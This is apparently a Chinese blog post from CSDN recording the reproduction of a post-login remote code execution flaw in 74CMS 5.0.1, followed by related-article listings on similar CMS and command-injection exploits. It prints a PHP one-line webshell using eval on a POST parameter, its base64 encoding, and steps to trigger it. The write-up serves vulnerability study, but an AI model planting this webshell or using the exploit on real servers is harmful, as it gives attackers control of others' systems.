74CMS 5.0.1后台RCE复现过程

最新推荐文章于 2024-03-28 17:47:55 发布
最新推荐文章于 2024-03-28 17:47:55 发布
阅读量2.6k 收藏
点赞数 1
分类专栏: 练题 文章标签: 安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821250/article/details/121888976
版权

在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述file_put_contents(‘写进去的文件名称和格式’,写的内容)
一句话木马:<?php @eval($_POST['attack']);?>
可以在bp里直接加密:PD9waHAgQGV2YWwoJF9QT1NUWydhdHRhY2snXSk7Pz4K

在这里插入图片描述这里需要访问url.php来激活403.php,url.php是一个页面,里面有程序代码可以跳转网址,我理解是访问它可以将刚才传进去的语句执行。

这里不一定访问激活,可以直接连接在当前即upload下的你传的文件
在这里插入图片描述
在这里插入图片描述
这个漏洞感觉就是你先跑出来后台管理员的用户和密码然后利用这个漏洞夸大危害直接黑进服务器。

if我是菜鸡
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74CMSRCE挖掘思路
include_voidmain的博客
04-06 2711
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
Linux常用命令
qq_48508278的博客
04-07 486
一.Linux常用命令: 目录管理 切换目录 cd ##;直接切换到某个目录下 cd /##/##; 切换到指定文件夹下的目录 cd ~;直接返回根目录下 列出目录 ls -a;全部文件列出 ls -l;长数据串列出 包含文件的属性和权限等等 ls -al;可以将上方两个上方结合来用 创建和删除 mkdir ###;创建一个目录 rmdir ###;表示删除该目录 mkdir -p ##/##/##;表示创建多层目录 查看 pwd ;查看当前是在哪个目录下 复制 cp 文件 目录;将文件复制到某个
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 806
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
在线复现漏洞cve-2020-35339(加日常想法)
FODKING的博客
04-20 1369
最近有半年没写了,感觉有很多东西想写,还是怕没人看,近期发现了一个在线的漏洞测试平台,大家可以看看。
74cms 任意代码执行(CVE-2020-35339)
weixin_44047654的博客
11-22 1128
74cms 任意代码执行(CVE-2020-35339)
74CMS漏洞复现
小小猪的博客
12-01 4112
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
74cms5.0.1RCE漏洞环境源码
10-18
74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境
74cms 骑士人才系统 v5.0.1 正式版
10-02
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md
最新发布
04-08
74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
骑士cms任意代码执行(CVE-2020-35339)
qq_34341458的博客
04-12 3344
本文章仅供学习使用,如用作非法用途,概不负责 0x01 漏洞介绍 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2793
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
Vulfocus 入门+初级
大雾
05-20 3312
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
PTB-CVE
zip471642048的博客
05-05 989
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 595
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3136
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 331
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
redis5.0.1
12-12
Redis 5.0.1是Redis的一个版本,它在Redis 5.0的基础上做了一些改进和优化。 Redis 5.0.1引入了Stream数据结构,这是一个新的数据类型,可以用来实现可持久化的消息队列。这个新特性使得Redis可以更好地支持消息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值